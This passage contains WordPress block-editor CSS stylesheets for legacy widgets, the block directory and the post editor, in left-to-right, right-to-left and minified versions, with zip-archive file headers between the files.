input[type=number],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=password],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=search],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=tel],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=text],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=time],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=url],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=week],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside select{ background-color:initial; border:1px solid #757575; border-radius:3px; box-shadow:none; box-sizing:border-box; color:#000; display:block; font-family:system-ui; font-size:13px; font-weight:400; line-height:1; margin:0; min-height:30px; padding-bottom:8px; padding-left:8px; padding-top:8px; width:100%; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside select{ padding-left:4px; } .wp-block-legacy-widget__edit-form .widget.open,.wp-block-legacy-widget__edit-form .widget.open:focus-within{ z-index:0; } .wp-block-legacy-widget__edit-form.wp-block-legacy-widget__edit-form,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview{ color:#000; } .wp-block-legacy-widget__edit-no-preview,.wp-block-legacy-widget__edit-preview{ cursor:pointer; } .wp-block-legacy-widget__edit-no-preview:hover:after,.wp-block-legacy-widget__edit-preview:hover:after{ border:1px solid #949494; border-radius:2px; bottom:0; content:""; left:0; position:absolute; right:0; top:0; } .wp-block-legacy-widget__edit-preview.is-offscreen{ left:-9999px; position:absolute; top:0; width:100%; } .wp-block-legacy-widget__edit-preview-iframe{ overflow:hidden; width:100%; } .wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview h3,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview p{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; } .wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview{ background:#f0f0f0; padding:8px 12px; } .wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview h3{ font-size:14px; font-weight:600; margin:4px 0; } .wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview p{ margin:4px 0; } .wp-block-legacy-widget-inspector-card{ padding:0 16px 16px 52px; } .interface-complementary-area .wp-block-legacy-widget-inspector-card__name{ font-weight:500; margin:0 0 5px; } .is-selected .wp-block-legacy-widget__container{ min-height:50px; padding:8px 12px; } .components-popover__content .wp-block-legacy-widget__edit-form{ min-width:400px; } .wp-block-widget-group.has-child-selected:after{ border:1px solid var(--wp-admin-theme-color); border-radius:2px; bottom:0; content:""; left:0; position:absolute; right:0; top:0; } .wp-block-widget-group .widget-title{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:18px; font-weight:600; } .wp-block-widget-group__placeholder .block-editor-inserter{ width:100%; } .is-dark-theme .wp-block-widget-group__placeholder .block-editor-button-block-appender{ box-shadow:inset 0 0 0 1px #1e1e1e; color:#1e1e1e; }PK!z݌dist/widgets/style-rtl.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-block-legacy-widget__edit-form:not([hidden]){display:flow-root}.wp-block-legacy-widget__edit-form{background:#fff;border:1px solid #1e1e1e;border-radius:2px;max-height:calc(100vh - 2px);overflow-y:scroll;padding:11px}.wp-block-legacy-widget__edit-form .wp-block-legacy-widget__edit-form-title{color:#000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:14px;font-weight:600;margin:0 0 12px}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside{border:none;box-shadow:none;display:block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside p{margin:8px 0}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside label{font-size:13px;line-height:2.1}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside a,.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input,.wp-block-legacy-widget__edit-form .widget-inside.widget-inside label{color:#000;font-family:system-ui;font-weight:400}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=date],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=datetime-local],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=datetime],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=email],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=month],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=number],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=password],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=search],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=tel],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=text],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=time],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=url],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=week],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside select{background-color:initial;border:1px solid #757575;border-radius:3px;box-shadow:none;box-sizing:border-box;color:#000;display:block;font-family:system-ui;font-size:13px;font-weight:400;line-height:1;margin:0;min-height:30px;padding-bottom:8px;padding-right:8px;padding-top:8px;width:100%}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside select{padding-right:4px}.wp-block-legacy-widget__edit-form .widget.open,.wp-block-legacy-widget__edit-form .widget.open:focus-within{z-index:0}.wp-block-legacy-widget__edit-form.wp-block-legacy-widget__edit-form,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview{color:#000}.wp-block-legacy-widget__edit-no-preview,.wp-block-legacy-widget__edit-preview{cursor:pointer}.wp-block-legacy-widget__edit-no-preview:hover:after,.wp-block-legacy-widget__edit-preview:hover:after{border:1px solid #949494;border-radius:2px;bottom:0;content:"";left:0;position:absolute;right:0;top:0}.wp-block-legacy-widget__edit-preview.is-offscreen{position:absolute;right:-9999px;top:0;width:100%}.wp-block-legacy-widget__edit-preview-iframe{overflow:hidden;width:100%}.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview h3,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview p{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px}.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview{background:#f0f0f0;padding:8px 12px}.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview h3{font-size:14px;font-weight:600;margin:4px 0}.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview p{margin:4px 0}.wp-block-legacy-widget-inspector-card{padding:0 52px 16px 16px}.interface-complementary-area .wp-block-legacy-widget-inspector-card__name{font-weight:500;margin:0 0 5px}.is-selected .wp-block-legacy-widget__container{min-height:50px;padding:8px 12px}.components-popover__content .wp-block-legacy-widget__edit-form{min-width:400px}.wp-block-widget-group.has-child-selected:after{border:1px solid var(--wp-admin-theme-color);border-radius:2px;bottom:0;content:"";left:0;position:absolute;right:0;top:0}.wp-block-widget-group .widget-title{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:18px;font-weight:600}.wp-block-widget-group__placeholder .block-editor-inserter{width:100%}.is-dark-theme .wp-block-widget-group__placeholder .block-editor-button-block-appender{box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e}PK!Ypcdist/widgets/style.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-block-legacy-widget__edit-form:not([hidden]){display:flow-root}.wp-block-legacy-widget__edit-form{background:#fff;border:1px solid #1e1e1e;border-radius:2px;max-height:calc(100vh - 2px);overflow-y:scroll;padding:11px}.wp-block-legacy-widget__edit-form .wp-block-legacy-widget__edit-form-title{color:#000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:14px;font-weight:600;margin:0 0 12px}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside{border:none;box-shadow:none;display:block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside p{margin:8px 0}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside label{font-size:13px;line-height:2.1}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside a,.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input,.wp-block-legacy-widget__edit-form .widget-inside.widget-inside label{color:#000;font-family:system-ui;font-weight:400}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=date],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=datetime-local],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=datetime],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=email],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=month],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=number],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=password],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=search],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=tel],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=text],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=time],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=url],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=week],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside select{background-color:initial;border:1px solid #757575;border-radius:3px;box-shadow:none;box-sizing:border-box;color:#000;display:block;font-family:system-ui;font-size:13px;font-weight:400;line-height:1;margin:0;min-height:30px;padding-bottom:8px;padding-left:8px;padding-top:8px;width:100%}.wp-block-legacy-widget__edit-form .widget-inside.widget-inside select{padding-left:4px}.wp-block-legacy-widget__edit-form .widget.open,.wp-block-legacy-widget__edit-form .widget.open:focus-within{z-index:0}.wp-block-legacy-widget__edit-form.wp-block-legacy-widget__edit-form,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview{color:#000}.wp-block-legacy-widget__edit-no-preview,.wp-block-legacy-widget__edit-preview{cursor:pointer}.wp-block-legacy-widget__edit-no-preview:hover:after,.wp-block-legacy-widget__edit-preview:hover:after{border:1px solid #949494;border-radius:2px;bottom:0;content:"";left:0;position:absolute;right:0;top:0}.wp-block-legacy-widget__edit-preview.is-offscreen{left:-9999px;position:absolute;top:0;width:100%}.wp-block-legacy-widget__edit-preview-iframe{overflow:hidden;width:100%}.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview h3,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview p{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px}.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview{background:#f0f0f0;padding:8px 12px}.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview h3{font-size:14px;font-weight:600;margin:4px 0}.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview p{margin:4px 0}.wp-block-legacy-widget-inspector-card{padding:0 16px 16px 52px}.interface-complementary-area .wp-block-legacy-widget-inspector-card__name{font-weight:500;margin:0 0 5px}.is-selected .wp-block-legacy-widget__container{min-height:50px;padding:8px 12px}.components-popover__content .wp-block-legacy-widget__edit-form{min-width:400px}.wp-block-widget-group.has-child-selected:after{border:1px solid var(--wp-admin-theme-color);border-radius:2px;bottom:0;content:"";left:0;position:absolute;right:0;top:0}.wp-block-widget-group .widget-title{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:18px;font-weight:600}.wp-block-widget-group__placeholder .block-editor-inserter{width:100%}.is-dark-theme .wp-block-widget-group__placeholder .block-editor-button-block-appender{box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e}PK!cAAdist/block-directory/style.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .block-directory-block-ratings>span{ display:flex; } .block-directory-block-ratings svg{ fill:#1e1e1e; margin-left:-4px; } .block-directory-block-ratings .block-directory-block-ratings__star-empty{ fill:#ccc; } .block-directory-compact-list{ list-style:none; margin:0; } .block-directory-compact-list__item{ align-items:center; display:flex; flex-direction:row; margin-bottom:16px; } .block-directory-compact-list__item:last-child{ margin-bottom:0; } .block-directory-compact-list__item-details{ margin-left:8px; } .block-directory-compact-list__item-title{ font-weight:500; } .block-directory-compact-list__item-author{ color:#757575; font-size:11px; } .block-directory-downloadable-block-icon{ border:1px solid #ddd; height:54px; min-width:54px; vertical-align:middle; width:54px; } .block-directory-downloadable-block-list-item+.block-directory-downloadable-block-list-item{ margin-top:4px; } .block-directory-downloadable-block-list-item{ appearance:none; background:none; border:0; display:grid; grid-template-columns:auto 1fr; height:auto; margin:0; padding:12px; text-align:left; width:100%; } @media not (prefers-reduced-motion){ .block-directory-downloadable-block-list-item{ transition:box-shadow .1s linear; } } .block-directory-downloadable-block-list-item{ position:relative; } .block-directory-downloadable-block-list-item:not([aria-disabled=true]){ cursor:pointer; } .block-directory-downloadable-block-list-item:hover,.block-directory-downloadable-block-list-item[data-focus-visible]{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-directory-downloadable-block-list-item.is-installing .block-directory-downloadable-block-list-item__author{ display:none; } .block-directory-downloadable-block-list-item__icon{ align-self:flex-start; margin-right:16px; position:relative; } .block-directory-downloadable-block-list-item__icon .block-directory-downloadable-block-list-item__spinner{ align-items:center; background:#ffffffbf; bottom:0; display:flex; justify-content:center; left:0; position:absolute; right:0; top:0; } .is-installing .block-directory-downloadable-block-list-item__icon{ margin-right:22px; } .block-directory-block-ratings{ display:block; margin-top:4px; } .block-directory-downloadable-block-list-item__details{ color:#1e1e1e; } .block-directory-downloadable-block-list-item__title{ display:block; font-weight:600; } .block-directory-downloadable-block-list-item__author{ display:block; font-weight:400; margin-top:4px; } .block-directory-downloadable-block-list-item__desc{ display:block; margin-top:8px; } .block-directory-downloadable-block-notice{ color:#cc1818; margin:8px 0 0; } .block-directory-downloadable-block-notice__content{ margin-bottom:8px; padding-right:12px; } .block-directory-downloadable-blocks-panel{ padding:16px; } .block-directory-downloadable-blocks-panel.has-blocks-loading{ color:#757575; font-style:normal; margin:112px 0; padding:0; text-align:center; } .block-directory-downloadable-blocks-panel.has-blocks-loading .components-spinner{ float:inherit; } .block-directory-downloadable-blocks-panel__no-local{ color:#757575; margin:48px 0; padding:0 64px; text-align:center; } .block-directory-downloadable-blocks-panel__title{ font-size:14px; margin:0 0 4px; } .block-directory-downloadable-blocks-panel__description,.installed-blocks-pre-publish-panel__copy{ margin-top:0; }PK!#։AA"dist/block-directory/style-rtl.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .block-directory-block-ratings>span{ display:flex; } .block-directory-block-ratings svg{ fill:#1e1e1e; margin-right:-4px; } .block-directory-block-ratings .block-directory-block-ratings__star-empty{ fill:#ccc; } .block-directory-compact-list{ list-style:none; margin:0; } .block-directory-compact-list__item{ align-items:center; display:flex; flex-direction:row; margin-bottom:16px; } .block-directory-compact-list__item:last-child{ margin-bottom:0; } .block-directory-compact-list__item-details{ margin-right:8px; } .block-directory-compact-list__item-title{ font-weight:500; } .block-directory-compact-list__item-author{ color:#757575; font-size:11px; } .block-directory-downloadable-block-icon{ border:1px solid #ddd; height:54px; min-width:54px; vertical-align:middle; width:54px; } .block-directory-downloadable-block-list-item+.block-directory-downloadable-block-list-item{ margin-top:4px; } .block-directory-downloadable-block-list-item{ appearance:none; background:none; border:0; display:grid; grid-template-columns:auto 1fr; height:auto; margin:0; padding:12px; text-align:right; width:100%; } @media not (prefers-reduced-motion){ .block-directory-downloadable-block-list-item{ transition:box-shadow .1s linear; } } .block-directory-downloadable-block-list-item{ position:relative; } .block-directory-downloadable-block-list-item:not([aria-disabled=true]){ cursor:pointer; } .block-directory-downloadable-block-list-item:hover,.block-directory-downloadable-block-list-item[data-focus-visible]{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-directory-downloadable-block-list-item.is-installing .block-directory-downloadable-block-list-item__author{ display:none; } .block-directory-downloadable-block-list-item__icon{ align-self:flex-start; margin-left:16px; position:relative; } .block-directory-downloadable-block-list-item__icon .block-directory-downloadable-block-list-item__spinner{ align-items:center; background:#ffffffbf; bottom:0; display:flex; justify-content:center; left:0; position:absolute; right:0; top:0; } .is-installing .block-directory-downloadable-block-list-item__icon{ margin-left:22px; } .block-directory-block-ratings{ display:block; margin-top:4px; } .block-directory-downloadable-block-list-item__details{ color:#1e1e1e; } .block-directory-downloadable-block-list-item__title{ display:block; font-weight:600; } .block-directory-downloadable-block-list-item__author{ display:block; font-weight:400; margin-top:4px; } .block-directory-downloadable-block-list-item__desc{ display:block; margin-top:8px; } .block-directory-downloadable-block-notice{ color:#cc1818; margin:8px 0 0; } .block-directory-downloadable-block-notice__content{ margin-bottom:8px; padding-left:12px; } .block-directory-downloadable-blocks-panel{ padding:16px; } .block-directory-downloadable-blocks-panel.has-blocks-loading{ color:#757575; font-style:normal; margin:112px 0; padding:0; text-align:center; } .block-directory-downloadable-blocks-panel.has-blocks-loading .components-spinner{ float:inherit; } .block-directory-downloadable-blocks-panel__no-local{ color:#757575; margin:48px 0; padding:0 64px; text-align:center; } .block-directory-downloadable-blocks-panel__title{ font-size:14px; margin:0 0 4px; } .block-directory-downloadable-blocks-panel__description,.installed-blocks-pre-publish-panel__copy{ margin-top:0; }PK!u"dist/block-directory/style.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.block-directory-block-ratings>span{display:flex}.block-directory-block-ratings svg{fill:#1e1e1e;margin-left:-4px}.block-directory-block-ratings .block-directory-block-ratings__star-empty{fill:#ccc}.block-directory-compact-list{list-style:none;margin:0}.block-directory-compact-list__item{align-items:center;display:flex;flex-direction:row;margin-bottom:16px}.block-directory-compact-list__item:last-child{margin-bottom:0}.block-directory-compact-list__item-details{margin-left:8px}.block-directory-compact-list__item-title{font-weight:500}.block-directory-compact-list__item-author{color:#757575;font-size:11px}.block-directory-downloadable-block-icon{border:1px solid #ddd;height:54px;min-width:54px;vertical-align:middle;width:54px}.block-directory-downloadable-block-list-item+.block-directory-downloadable-block-list-item{margin-top:4px}.block-directory-downloadable-block-list-item{appearance:none;background:none;border:0;display:grid;grid-template-columns:auto 1fr;height:auto;margin:0;padding:12px;text-align:left;width:100%}@media not (prefers-reduced-motion){.block-directory-downloadable-block-list-item{transition:box-shadow .1s linear}}.block-directory-downloadable-block-list-item{position:relative}.block-directory-downloadable-block-list-item:not([aria-disabled=true]){cursor:pointer}.block-directory-downloadable-block-list-item:hover,.block-directory-downloadable-block-list-item[data-focus-visible]{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-directory-downloadable-block-list-item.is-installing .block-directory-downloadable-block-list-item__author{display:none}.block-directory-downloadable-block-list-item__icon{align-self:flex-start;margin-right:16px;position:relative}.block-directory-downloadable-block-list-item__icon .block-directory-downloadable-block-list-item__spinner{align-items:center;background:#ffffffbf;bottom:0;display:flex;justify-content:center;left:0;position:absolute;right:0;top:0}.is-installing .block-directory-downloadable-block-list-item__icon{margin-right:22px}.block-directory-block-ratings{display:block;margin-top:4px}.block-directory-downloadable-block-list-item__details{color:#1e1e1e}.block-directory-downloadable-block-list-item__title{display:block;font-weight:600}.block-directory-downloadable-block-list-item__author{display:block;font-weight:400;margin-top:4px}.block-directory-downloadable-block-list-item__desc{display:block;margin-top:8px}.block-directory-downloadable-block-notice{color:#cc1818;margin:8px 0 0}.block-directory-downloadable-block-notice__content{margin-bottom:8px;padding-right:12px}.block-directory-downloadable-blocks-panel{padding:16px}.block-directory-downloadable-blocks-panel.has-blocks-loading{color:#757575;font-style:normal;margin:112px 0;padding:0;text-align:center}.block-directory-downloadable-blocks-panel.has-blocks-loading .components-spinner{float:inherit}.block-directory-downloadable-blocks-panel__no-local{color:#757575;margin:48px 0;padding:0 64px;text-align:center}.block-directory-downloadable-blocks-panel__title{font-size:14px;margin:0 0 4px}.block-directory-downloadable-blocks-panel__description,.installed-blocks-pre-publish-panel__copy{margin-top:0}PK!-&dist/block-directory/style-rtl.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.block-directory-block-ratings>span{display:flex}.block-directory-block-ratings svg{fill:#1e1e1e;margin-right:-4px}.block-directory-block-ratings .block-directory-block-ratings__star-empty{fill:#ccc}.block-directory-compact-list{list-style:none;margin:0}.block-directory-compact-list__item{align-items:center;display:flex;flex-direction:row;margin-bottom:16px}.block-directory-compact-list__item:last-child{margin-bottom:0}.block-directory-compact-list__item-details{margin-right:8px}.block-directory-compact-list__item-title{font-weight:500}.block-directory-compact-list__item-author{color:#757575;font-size:11px}.block-directory-downloadable-block-icon{border:1px solid #ddd;height:54px;min-width:54px;vertical-align:middle;width:54px}.block-directory-downloadable-block-list-item+.block-directory-downloadable-block-list-item{margin-top:4px}.block-directory-downloadable-block-list-item{appearance:none;background:none;border:0;display:grid;grid-template-columns:auto 1fr;height:auto;margin:0;padding:12px;text-align:right;width:100%}@media not (prefers-reduced-motion){.block-directory-downloadable-block-list-item{transition:box-shadow .1s linear}}.block-directory-downloadable-block-list-item{position:relative}.block-directory-downloadable-block-list-item:not([aria-disabled=true]){cursor:pointer}.block-directory-downloadable-block-list-item:hover,.block-directory-downloadable-block-list-item[data-focus-visible]{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-directory-downloadable-block-list-item.is-installing .block-directory-downloadable-block-list-item__author{display:none}.block-directory-downloadable-block-list-item__icon{align-self:flex-start;margin-left:16px;position:relative}.block-directory-downloadable-block-list-item__icon .block-directory-downloadable-block-list-item__spinner{align-items:center;background:#ffffffbf;bottom:0;display:flex;justify-content:center;left:0;position:absolute;right:0;top:0}.is-installing .block-directory-downloadable-block-list-item__icon{margin-left:22px}.block-directory-block-ratings{display:block;margin-top:4px}.block-directory-downloadable-block-list-item__details{color:#1e1e1e}.block-directory-downloadable-block-list-item__title{display:block;font-weight:600}.block-directory-downloadable-block-list-item__author{display:block;font-weight:400;margin-top:4px}.block-directory-downloadable-block-list-item__desc{display:block;margin-top:8px}.block-directory-downloadable-block-notice{color:#cc1818;margin:8px 0 0}.block-directory-downloadable-block-notice__content{margin-bottom:8px;padding-left:12px}.block-directory-downloadable-blocks-panel{padding:16px}.block-directory-downloadable-blocks-panel.has-blocks-loading{color:#757575;font-style:normal;margin:112px 0;padding:0;text-align:center}.block-directory-downloadable-blocks-panel.has-blocks-loading .components-spinner{float:inherit}.block-directory-downloadable-blocks-panel__no-local{color:#757575;margin:48px 0;padding:0 64px;text-align:center}.block-directory-downloadable-blocks-panel__title{font-size:14px;margin:0 0 4px}.block-directory-downloadable-blocks-panel__description,.installed-blocks-pre-publish-panel__copy{margin-top:0}PK! i==dist/edit-post/style-rtl.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .edit-post-fullscreen-mode-close__view-mode-toggle{ height:64px; right:0; top:0; 